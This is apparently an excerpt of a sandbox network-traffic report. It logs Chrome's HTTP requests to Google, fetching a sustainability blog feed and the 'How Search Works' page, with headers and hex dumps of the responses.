                                                                                                                                                                                                                                                                                          2024-09-27 14:41:57 UTC724INData Raw: 7b 22 6d 65 74 61 22 3a 7b 22 74 6f 74 61 6c 5f 63 6f 75 6e 74 22 3a 33 36 32 7d 2c 22 6e 65 78 74 5f 70 61 67 65 22 3a 22 2f 61 70 69 2f 76 32 2f 6c 61 74 65 73 74 3f 70 61 67 69 6e 61 74 65 3d 31 32 26 74 61 67 73 3d 73 75 73 74 61 69 6e 61 62 69 6c 69 74 79 26 66 69 65 6c 64 73 3d 26 69 73 5f 6d 61 69 6e 5f 68 65 72 6f 3d 46 61 6c 73 65 26 73 68 6f 77 5f 68 65 72 6f 3d 54 72 75 65 26 63 75 72 73 6f 72 3d 32 22 2c 22 72 65 73 75 6c 74 73 22 3a 5b 7b 22 65 79 65 62 72 6f 77 22 3a 22 3c 74 69 6d 65 20 63 6c 61 73 73 3d 5c 22 75 6e 69 2d 74 69 6d 65 73 69 6e 63 65 5c 22 20 64 61 74 65 74 69 6d 65 3d 5c 22 32 30 32 34 2d 30 39 2d 31 39 20 31 33 3a 30 30 3a 30 30 2b 30 30 3a 30 30 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 5c 22 53 65 70 74 65 6d 62 65 72 20
                                                                                                                                                                                                                                                                                          Data Ascii: {"meta":{"total_count":362},"next_page":"/api/v2/latest?paginate=12&tags=sustainability&fields=&is_main_hero=False&show_hero=True&cursor=2","results":[{"eyebrow":"<time class=\"uni-timesince\" datetime=\"2024-09-19 13:00:00+00:00\" aria-label=\"September
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:57 UTC1408INData Raw: 22 2c 22 73 69 74 65 73 70 61 63 65 5f 72 65 6e 64 65 72 22 3a 22 22 2c 22 73 69 74 65 73 70 61 63 65 22 3a 22 22 2c 22 77 6f 72 64 5f 63 6f 75 6e 74 22 3a 37 32 37 2c 22 70 75 62 6c 69 73 68 65 64 5f 72 65 61 64 61 62 6c 65 5f 64 61 74 65 22 3a 22 53 65 70 20 31 39 22 2c 22 74 61 67 5f 65 79 65 62 72 6f 77 22 3a 22 68 74 74 70 73 3a 2f 2f 62 6c 6f 67 2e 67 6f 6f 67 6c 65 2f 69 6e 73 69 64 65 2d 67 6f 6f 67 6c 65 2f 69 6e 66 72 61 73 74 72 75 63 74 75 72 65 2f 22 2c 22 70 75 62 6c 69 73 68 65 64 5f 6e 6f 64 65 22 3a 22 3c 74 69 6d 65 20 63 6c 61 73 73 3d 5c 22 75 6e 69 2d 74 69 6d 65 73 69 6e 63 65 5c 22 20 64 61 74 65 74 69 6d 65 3d 5c 22 32 30 32 34 2d 30 39 2d 31 39 20 31 33 3a 30 30 3a 30 30 2b 30 30 3a 30 30 5c 22 3e 53 65 70 20 31 39 3c 2f 74 69 6d
                                                                                                                                                                                                                                                                                          Data Ascii: ","sitespace_render":"","sitespace":"","word_count":727,"published_readable_date":"Sep 19","tag_eyebrow":"https://blog.google/inside-google/infrastructure/","published_node":"<time class=\"uni-timesince\" datetime=\"2024-09-19 13:00:00+00:00\">Sep 19</tim
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:57 UTC1408INData Raw: 6d 20 77 69 74 68 69 6e 20 32 30 20 6d 69 6e 75 74 65 73 2e 22 2c 22 63 61 74 65 67 6f 72 79 22 3a 22 61 72 74 69 63 6c 65 22 2c 22 61 75 74 68 6f 72 22 3a 22 43 68 72 69 73 74 6f 70 68 65 72 20 56 61 6e 20 41 72 73 64 61 6c 65 22 2c 22 74 61 67 5f 6e 61 6d 65 22 3a 22 53 75 73 74 61 69 6e 61 62 69 6c 69 74 79 22 2c 22 73 69 74 65 73 70 61 63 65 5f 72 65 6e 64 65 72 22 3a 22 22 2c 22 73 69 74 65 73 70 61 63 65 22 3a 22 22 2c 22 77 6f 72 64 5f 63 6f 75 6e 74 22 3a 34 36 37 2c 22 70 75 62 6c 69 73 68 65 64 5f 72 65 61 64 61 62 6c 65 5f 64 61 74 65 22 3a 22 53 65 70 20 31 36 22 2c 22 74 61 67 5f 65 79 65 62 72 6f 77 22 3a 22 68 74 74 70 73 3a 2f 2f 62 6c 6f 67 2e 67 6f 6f 67 6c 65 2f 6f 75 74 72 65 61 63 68 2d 69 6e 69 74 69 61 74 69 76 65 73 2f 73 75 73 74
                                                                                                                                                                                                                                                                                          Data Ascii: m within 20 minutes.","category":"article","author":"Christopher Van Arsdale","tag_name":"Sustainability","sitespace_render":"","sitespace":"","word_count":467,"published_readable_date":"Sep 16","tag_eyebrow":"https://blog.google/outreach-initiatives/sust
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:57 UTC1280INData Raw: 6f 6e 20 72 65 6d 6f 76 61 6c 20 63 72 65 64 69 74 73 20 66 72 6f 6d 20 48 6f 6c 6f 63 65 6e 65 2c 20 61 74 20 74 68 65 20 6c 6f 77 65 73 74 20 70 72 69 63 65 20 6f 6e 20 72 65 63 6f 72 64 20 66 6f 72 20 64 69 72 65 63 74 20 61 69 72 20 63 61 70 74 75 72 65 2e 22 2c 22 63 61 74 65 67 6f 72 79 22 3a 22 61 72 74 69 63 6c 65 22 2c 22 61 75 74 68 6f 72 22 3a 22 52 61 6e 64 79 20 53 70 6f 63 6b 22 2c 22 74 61 67 5f 6e 61 6d 65 22 3a 22 53 75 73 74 61 69 6e 61 62 69 6c 69 74 79 22 2c 22 73 69 74 65 73 70 61 63 65 5f 72 65 6e 64 65 72 22 3a 22 22 2c 22 73 69 74 65 73 70 61 63 65 22 3a 22 22 2c 22 77 6f 72 64 5f 63 6f 75 6e 74 22 3a 36 37 32 2c 22 70 75 62 6c 69 73 68 65 64 5f 72 65 61 64 61 62 6c 65 5f 64 61 74 65 22 3a 22 53 65 70 20 31 30 22 2c 22 74 61 67 5f
                                                                                                                                                                                                                                                                                          Data Ascii: on removal credits from Holocene, at the lowest price on record for direct air capture.","category":"article","author":"Randy Spock","tag_name":"Sustainability","sitespace_render":"","sitespace":"","word_count":672,"published_readable_date":"Sep 10","tag_
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:57 UTC1408INData Raw: 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 67 77 65 62 2d 75 6e 69 62 6c 6f 67 2d 70 75 62 6c 69 73 68 2d 70 72 6f 64 2f 6f 72 69 67 69 6e 61 6c 5f 69 6d 61 67 65 73 2f 61 69 2d 65 78 74 72 65 6d 65 2d 68 65 61 74 2d 68 65 72 6f 2d 5f 53 53 2e 6a 70 67 22 2c 22 74 61 67 73 22 3a 22 72 65 73 65 61 72 63 68 2c 73 75 73 74 61 69 6e 61 62 69 6c 69 74 79 2c 61 69 22 2c 22 73 75 6d 6d 61 72 79 22 3a 22 4f 75 72 20 6e 65 77 20 48 65 61 74 20 52 65 73 69 6c 69 65 6e 63 65 20 74 6f 6f 6c 20 75 73 65 73 20 41 49 20 74 6f 20 68 65 6c 70 20 63 69 74 69 65 73 20 70 72 69 6f 72 69 74 69 7a 65 20 77 68 65 72 65 20 74 6f 20 69 6d 70 6c 65 6d 65 6e 74 20 63 6f 6f 6c 69 6e 67 20 73 74 72 61 74 65 67 69 65 73 2e 22 2c 22 63 61 74 65 67 6f 72 79 22 3a 22 61 72 74 69 63 6c
                                                                                                                                                                                                                                                                                          Data Ascii: googleapis.com/gweb-uniblog-publish-prod/original_images/ai-extreme-heat-hero-_SS.jpg","tags":"research,sustainability,ai","summary":"Our new Heat Resilience tool uses AI to help cities prioritize where to implement cooling strategies.","category":"articl
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:57 UTC1408INData Raw: 22 3a 22 32 30 32 34 2d 30 38 2d 32 30 7c 31 33 3a 30 30 22 2c 22 68 65 72 6f 22 3a 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 61 67 65 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 67 77 65 62 2d 75 6e 69 62 6c 6f 67 2d 70 75 62 6c 69 73 68 2d 70 72 6f 64 2f 6f 72 69 67 69 6e 61 6c 5f 69 6d 61 67 65 73 2f 49 6d 61 67 65 5f 32 30 32 34 30 38 31 36 5f 31 33 30 39 30 32 5f 39 39 31 2e 70 6e 67 22 2c 22 74 61 67 73 22 3a 22 73 75 73 74 61 69 6e 61 62 69 6c 69 74 79 22 2c 22 73 75 6d 6d 61 72 79 22 3a 22 57 65 e2 80 99 72 65 20 61 6e 6e 6f 75 6e 63 69 6e 67 20 6e 65 77 20 63 6f 6c 6c 61 62 6f 72 61 74 69 6f 6e 73 20 77 69 74 68 20 45 6e 65 72 67 69 78 20 52 65 6e 65 77 61 62 6c 65 73 20 61 6e 64 20 53 77 69 66 74 20 43 75 72 72 65 6e 74 20 45 6e 65 72 67 79 20
                                                                                                                                                                                                                                                                                          Data Ascii: ":"2024-08-20|13:00","hero":"https://storage.googleapis.com/gweb-uniblog-publish-prod/original_images/Image_20240816_130902_991.png","tags":"sustainability","summary":"Were announcing new collaborations with Energix Renewables and Swift Current Energy
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:57 UTC1408INData Raw: 3a 22 3c 74 69 6d 65 20 63 6c 61 73 73 3d 5c 22 75 6e 69 2d 74 69 6d 65 73 69 6e 63 65 5c 22 20 64 61 74 65 74 69 6d 65 3d 5c 22 32 30 32 34 2d 30 38 2d 32 30 20 31 33 3a 30 30 3a 30 30 2b 30 30 3a 30 30 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 5c 22 41 75 67 75 73 74 20 32 30 5c 22 3e 41 75 67 20 32 30 3c 2f 74 69 6d 65 3e 20 2f 20 53 75 73 74 61 69 6e 61 62 69 6c 69 74 79 22 2c 22 67 6f 5f 6c 69 76 65 5f 64 61 74 65 5f 74 69 6d 65 22 3a 22 32 30 32 34 2d 30 38 2d 32 30 7c 31 33 3a 30 30 22 2c 22 68 65 72 6f 22 3a 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 61 67 65 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 67 77 65 62 2d 75 6e 69 62 6c 6f 67 2d 70 75 62 6c 69 73 68 2d 70 72 6f 64 2f 6f 72 69 67 69 6e 61 6c 5f 69 6d 61 67 65 73 2f 67 6f 6f 67 6c 65 5f
                                                                                                                                                                                                                                                                                          Data Ascii: :"<time class=\"uni-timesince\" datetime=\"2024-08-20 13:00:00+00:00\" aria-label=\"August 20\">Aug 20</time> / Sustainability","go_live_date_time":"2024-08-20|13:00","hero":"https://storage.googleapis.com/gweb-uniblog-publish-prod/original_images/google_
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:57 UTC1408INData Raw: 6f 70 65 72 74 69 65 73 22 3a 7b 22 68 61 73 5f 63 61 72 6f 75 73 65 6c 22 3a 22 6e 6f 22 2c 22 68 61 73 5f 69 6d 61 67 65 22 3a 22 79 65 73 22 2c 22 68 61 73 5f 61 75 64 69 6f 22 3a 22 6e 6f 22 2c 22 68 61 73 5f 76 69 64 65 6f 22 3a 22 79 65 73 22 2c 22 68 65 72 6f 5f 6d 65 64 69 61 5f 74 79 70 65 22 3a 22 76 69 64 65 6f 22 7d 7d 2c 7b 22 65 79 65 62 72 6f 77 22 3a 22 3c 74 69 6d 65 20 63 6c 61 73 73 3d 5c 22 75 6e 69 2d 74 69 6d 65 73 69 6e 63 65 5c 22 20 64 61 74 65 74 69 6d 65 3d 5c 22 32 30 32 34 2d 30 37 2d 32 39 20 32 32 3a 30 31 3a 30 30 2b 30 30 3a 30 30 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 5c 22 4a 75 6c 79 20 32 39 5c 22 3e 4a 75 6c 20 32 39 3c 2f 74 69 6d 65 3e 20 2f 20 53 75 73 74 61 69 6e 61 62 69 6c 69 74 79 22 2c 22 67 6f 5f 6c 69 76
                                                                                                                                                                                                                                                                                          Data Ascii: operties":{"has_carousel":"no","has_image":"yes","has_audio":"no","has_video":"yes","hero_media_type":"video"}},{"eyebrow":"<time class=\"uni-timesince\" datetime=\"2024-07-29 22:01:00+00:00\" aria-label=\"July 29\">Jul 29</time> / Sustainability","go_liv
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:57 UTC1408INData Raw: 65 22 3a 22 57 69 6c 64 66 69 72 65 20 62 6f 75 6e 64 61 72 79 20 6d 61 70 73 20 65 78 70 61 6e 64 20 74 6f 20 6e 65 77 20 63 6f 75 6e 74 72 69 65 73 20 69 6e 20 45 75 72 6f 70 65 20 61 6e 64 20 41 66 72 69 63 61 22 2c 22 63 6f 6e 74 65 6e 74 5f 63 61 74 65 67 6f 72 79 22 3a 22 41 6e 6e 6f 75 6e 63 65 6d 65 6e 74 22 2c 22 61 6e 61 6c 79 74 69 63 73 5f 70 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 68 61 73 5f 63 61 72 6f 75 73 65 6c 22 3a 22 6e 6f 22 2c 22 68 61 73 5f 69 6d 61 67 65 22 3a 22 79 65 73 22 2c 22 68 61 73 5f 61 75 64 69 6f 22 3a 22 6e 6f 22 2c 22 68 61 73 5f 76 69 64 65 6f 22 3a 22 6e 6f 22 2c 22 68 65 72 6f 5f 6d 65 64 69 61 5f 74 79 70 65 22 3a 22 69 6d 61 67 65 22 7d 7d 2c 7b 22 65 79 65 62 72 6f 77 22 3a 22 3c 74 69 6d 65 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                                                          Data Ascii: e":"Wildfire boundary maps expand to new countries in Europe and Africa","content_category":"Announcement","analytics_properties":{"has_carousel":"no","has_image":"yes","has_audio":"no","has_video":"no","hero_media_type":"image"}},{"eyebrow":"<time class=
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:57 UTC1152INData Raw: 6f 20 72 65 64 75 63 65 20 73 74 6f 70 2d 61 6e 64 2d 67 6f 20 74 72 61 66 66 69 63 20 6f 6e 20 79 6f 75 72 20 72 6f 75 74 65 20 e2 80 94 20 61 6e 64 20 66 69 67 68 74 20 66 75 65 6c 20 65 6d 69 73 73 69 6f 6e 73 22 2c 22 63 6f 6e 74 65 6e 74 5f 63 61 74 65 67 6f 72 79 22 3a 22 45 64 69 74 6f 72 69 61 6c 20 66 65 61 74 75 72 65 22 2c 22 61 6e 61 6c 79 74 69 63 73 5f 70 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 68 61 73 5f 63 61 72 6f 75 73 65 6c 22 3a 22 6e 6f 22 2c 22 68 61 73 5f 69 6d 61 67 65 22 3a 22 79 65 73 22 2c 22 68 61 73 5f 61 75 64 69 6f 22 3a 22 6e 6f 22 2c 22 68 61 73 5f 76 69 64 65 6f 22 3a 22 79 65 73 22 2c 22 68 65 72 6f 5f 6d 65 64 69 61 5f 74 79 70 65 22 3a 22 67 69 66 22 7d 7d 2c 7b 22 65 79 65 62 72 6f 77 22 3a 22 3c 74 69 6d 65 20 63 6c
                                                                                                                                                                                                                                                                                          Data Ascii: o reduce stop-and-go traffic on your route and fight fuel emissions","content_category":"Editorial feature","analytics_properties":{"has_carousel":"no","has_image":"yes","has_audio":"no","has_video":"yes","hero_media_type":"gif"}},{"eyebrow":"<time cl


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          135192.168.2.750093142.250.186.1744435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:20 UTC1100OUTGET /search/howsearchworks/?fg=1 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:20 UTC468INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                          Location: https://www.google.com/search/howsearchworks/?fg=1
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          Content-Length: 247
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:42:04 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 15:12:04 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=1800
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Age: 16
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:20 UTC247INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 65 61 72 63 68 2f 68 6f 77 73 65 61 72 63 68 77 6f 72 6b 73 2f 3f 66 67 3d 31 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/search/howsearchworks/?fg=1">here</A>.</BODY></HTML>


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          136192.168.2.750094142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:21 UTC1433OUTGET /search/howsearchworks/?fg=1 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:21 UTC1250INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'sha256-jiZ/2CbDVD0IW5WyFBjU66UsWqfpROFuBh0hZq4VwHQ=' 'sha256-uq+4nUqZONgARzmy2kR1w9EC+Qeig/Syd091LyT8vOk=' 'nonce-uGzzHBAMHX3QDRPfoIrIzQ' 'report-sample' 'strict-dynamic' 'unsafe-eval' 'unsafe-hashes' 'unsafe-inline' http: https:; object-src 'none'; report-uri https://csp.withgoogle.com/csp/uxe-owners-acl/www_google; base-uri 'none'
                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/uxe-owners-acl/www_google
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="uxe-owners-acl/www_google"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"uxe-owners-acl/www_google","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/uxe-owners-acl/www_google"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 167739
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:42:21 GMT
                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                          Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 17 Sep 2024 06:00:00 GMT
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:21 UTC140INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e
                                                                                                                                                                                                                                                                                          Data Ascii: <!doctype html><html lang="en" dir="ltr"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1">
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:21 UTC1390INData Raw: 0a 3c 74 69 74 6c 65 3e 47 6f 6f 67 6c 65 20 53 65 61 72 63 68 20 e2 80 93 20 57 68 61 74 20 49 73 20 47 6f 6f 67 6c 65 20 53 65 61 72 63 68 20 41 6e 64 20 48 6f 77 20 44 6f 65 73 20 49 74 20 57 6f 72 6b 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 47 6f 6f 67 6c 65 20 53 65 61 72 63 68 20 e2 80 93 20 57 68 61 74 20 49 73 20 47 6f 6f 67 6c 65 20 53 65 61 72 63 68 20 41 6e 64 20 48 6f 77 20 44 6f 65 73 20 49 74 20 57 6f 72 6b 22 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 47 6f 6f 67 6c 65 20 53 65 61 72 63 68 20 e2 80 93 20 57 68 61
                                                                                                                                                                                                                                                                                          Data Ascii: <title>Google Search What Is Google Search And How Does It Work</title><meta content="website" property="og:type"><meta content="Google Search What Is Google Search And How Does It Work" property="og:title"><meta content="Google Search Wha
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:21 UTC1390INData Raw: 74 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2f 31 37 30 34 38 35 35 31 33 30 36 31 32 38 37 33 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 6c 69
                                                                                                                                                                                                                                                                                          Data Ascii: t-file-upload/1704855130612873/favicon.ico"><link rel="preconnect" href="https://fonts.googleapis.com" crossorigin><link rel="preconnect" href="https://gstatic.com" crossorigin><link rel="preconnect" href="https://googletagmanager.com" crossorigin><li
